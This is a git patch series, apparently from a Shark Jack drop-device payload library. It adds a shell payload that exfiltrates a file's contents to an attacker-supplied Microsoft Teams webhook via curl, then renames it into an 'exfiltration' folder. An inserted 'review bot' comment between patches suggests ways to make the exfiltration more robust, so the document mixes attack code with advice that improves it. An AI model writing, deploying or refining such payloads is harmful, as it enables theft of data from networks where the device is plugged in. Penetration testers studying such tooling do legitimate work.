From 842dfa90cd28fa50af9c5115770302e3bcfd87c1 Mon Sep 17 00:00:00 2001
From: jboz
Date: Wed, 19 Jan 2022 19:46:23 +0100
Subject: [PATCH 1/3] add exfiltration payload work with ms teams

---
 .../example/ms-teams-exfiltration/README.md | 7 +++
 .../example/ms-teams-exfiltration/payload.sh | 48 +++++++++++++++++++
 2 files changed, 55 insertions(+)
 create mode 100644 payloads/library/example/ms-teams-exfiltration/README.md
 create mode 100644 payloads/library/example/ms-teams-exfiltration/payload.sh

diff --git a/payloads/library/example/ms-teams-exfiltration/README.md b/payloads/library/example/ms-teams-exfiltration/README.md
new file mode 100644
index 0000000..3f401c6
--- /dev/null
+++ b/payloads/library/example/ms-teams-exfiltration/README.md
@@ -0,0 +1,7 @@
+- Install following packages : ``` curl ```
+- Refer to this payload to install package https://github.com/julesbozouklian/shark_jack_payload/blob/main/payload/util/install_package.sh
+- Or SSH to the Shark jack and use following command : ``` opkg install curl ```
+
+- Create a Teams canal
+- Add the application Incoming Webhook
+- Get your WebHook URL
diff --git a/payloads/library/example/ms-teams-exfiltration/payload.sh b/payloads/library/example/ms-teams-exfiltration/payload.sh
new file mode 100644
index 0000000..984983f
--- /dev/null
+++ b/payloads/library/example/ms-teams-exfiltration/payload.sh
@@ -0,0 +1,48 @@
+#!/bin/sh
+# Title: Ms Teams
+# Description: Exfiltrate data with microsoft teams
+
+# Author: Jules Bozouklian - bozou_client
+# Version: 1.0
+# Category: Exfiltrate
+#
+# LED SETUP (Magenta)... Setting logs and waiting for IP address from DHCP
+# LED ATTACK (Yellow)... Send message
+#
+
+LOG_DIR=/root/loot/exfiltrate/ms-teams
+TIMESTAMP=`date +"%Y-%m-%d"`
+
+WEB_HOOK_URL=""
+
+
+LED SETUP
+
+NETMODE DHCP_CLIENT
+
+# Make log file
+mkdir -p $LOG_DIR
+LOG_FILE=$TIMESTAMP"_$(find $LOG_DIR -type f | wc -l).log"
+LOG="$LOG_DIR/$LOG_FILE"
+
+# Wait until Shark Jack has an IP address
+while [ -z "$IPADDR" ]; do sleep 1 && IPADDR=$(ifconfig eth0 | grep "inet addr"); done
+
+LED ATTACK
+
+# create a fake file to send
+touch /root/test-file.txt
+echo "Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-19 19:12 CET
+Nmap scan report for scanme.nmap.org (45.33.32.156)
+Host is up (0.15s latency).
+Other addresses for scanme.nmap.org (not scanned): 2600:3c01::f03c:91ff:fe18:bb2f
+Not shown: 995 closed tcp ports (conn-refused)" >> /root/test-file.txt
+
+
+function sendToMsTeams() {
+ curl -H 'Content-Type: application/json' -X POST -d "{'text': '$(printf '%s' $(cat /root/test-file.txt))'}" $WEB_HOOK_URL
+}
+
+sendToMsTeams
+
+LED FINISH
From b7048f1da6d932d740b91d213c4d51ba2c9e6fb4 Mon Sep 17 00:00:00 2001
From: Darren Kitchen
Date: Wed, 19 Jan 2022 13:20:34 -0600
Subject: [PATCH 2/3] Rename payloads/library/example/ms-teams-exfiltration/README.md to payloads/library/exfiltration/ms-teams-exfiltration/README.md

---
 .../{example => exfiltration}/ms-teams-exfiltration/README.md | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 rename payloads/library/{example => exfiltration}/ms-teams-exfiltration/README.md (100%)
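Review bot: `sendToMsTeams` builds the request body by interpolating `$(cat /root/test-file.txt)` into the `-d` string, so the unquoted command substitution word-splits the file, `printf '%s'` glues the words back together with no separators, and any `'`, `"`, `\` or `}` in the exfiltrated data breaks or rewrites the JSON (the single-quoted `{'text': ...}` is also not strict JSON, so acceptance depends on how lenient the endpoint is). Since the payload exists to ship arbitrary loot, the body should come from a JSON encoder rather than string concatenation, curl should fail loudly with `-sS --fail` and a quoted `"$WEB_HOOK_URL"`, and the script should abort before `NETMODE` when `WEB_HOOK_URL` is still the empty default, e.g. `[ -n "$WEB_HOOK_URL" ] || { LED FAIL; exit 1; }` (assuming the LED command has a FAIL state alongside SETUP/ATTACK/FINISH). `jq` is an extra opkg package beyond the `curl` the README lists, so either document it there or fall back to a sed escaper for `\`, `"` and newlines. Two smaller points: `LOG_FILE`/`LOG` are computed but nothing is ever written to them, and the `function` keyword under `#!/bin/sh` relies on the device shell accepting that bashism — `sendToMsTeams() {` is portable.
```shell
# Abort early: an empty webhook URL would only fail inside curl, after NETMODE has already reconfigured the port.
[ -n "$WEB_HOOK_URL" ] || { LED FAIL; exit 1; }

# … unchanged: LED SETUP, NETMODE DHCP_CLIENT, log dir, DHCP wait, test file …

sendToMsTeams() {
    # Encode the loot with a JSON encoder so quotes, braces, backslashes and
    # newlines in the data cannot break or alter the request body.
    body=$(jq -Rs '{text: .}' /root/test-file.txt) || return 1
    curl -sS --fail -H 'Content-Type: application/json' -X POST \
        --data-binary "$body" "$WEB_HOOK_URL"
}
```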
diff --git a/payloads/library/example/ms-teams-exfiltration/README.md b/payloads/library/exfiltration/ms-teams-exfiltration/README.md
similarity index 100%
rename from payloads/library/example/ms-teams-exfiltration/README.md
rename to payloads/library/exfiltration/ms-teams-exfiltration/README.md

From 7114f3a702c7397230a8205dd8af373058cf5303 Mon Sep 17 00:00:00 2001
From: Darren Kitchen
Date: Wed, 19 Jan 2022 13:21:51 -0600
Subject: [PATCH 3/3] Rename payloads/library/example/ms-teams-exfiltration/payload.sh to payloads/library/exfiltration/ms-teams-exfiltration/payload.sh

---
 .../{example => exfiltration}/ms-teams-exfiltration/payload.sh | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 rename payloads/library/{example => exfiltration}/ms-teams-exfiltration/payload.sh (100%)

diff --git a/payloads/library/example/ms-teams-exfiltration/payload.sh b/payloads/library/exfiltration/ms-teams-exfiltration/payload.sh
similarity index 100%
rename from payloads/library/example/ms-teams-exfiltration/payload.sh
rename to payloads/library/exfiltration/ms-teams-exfiltration/payload.sh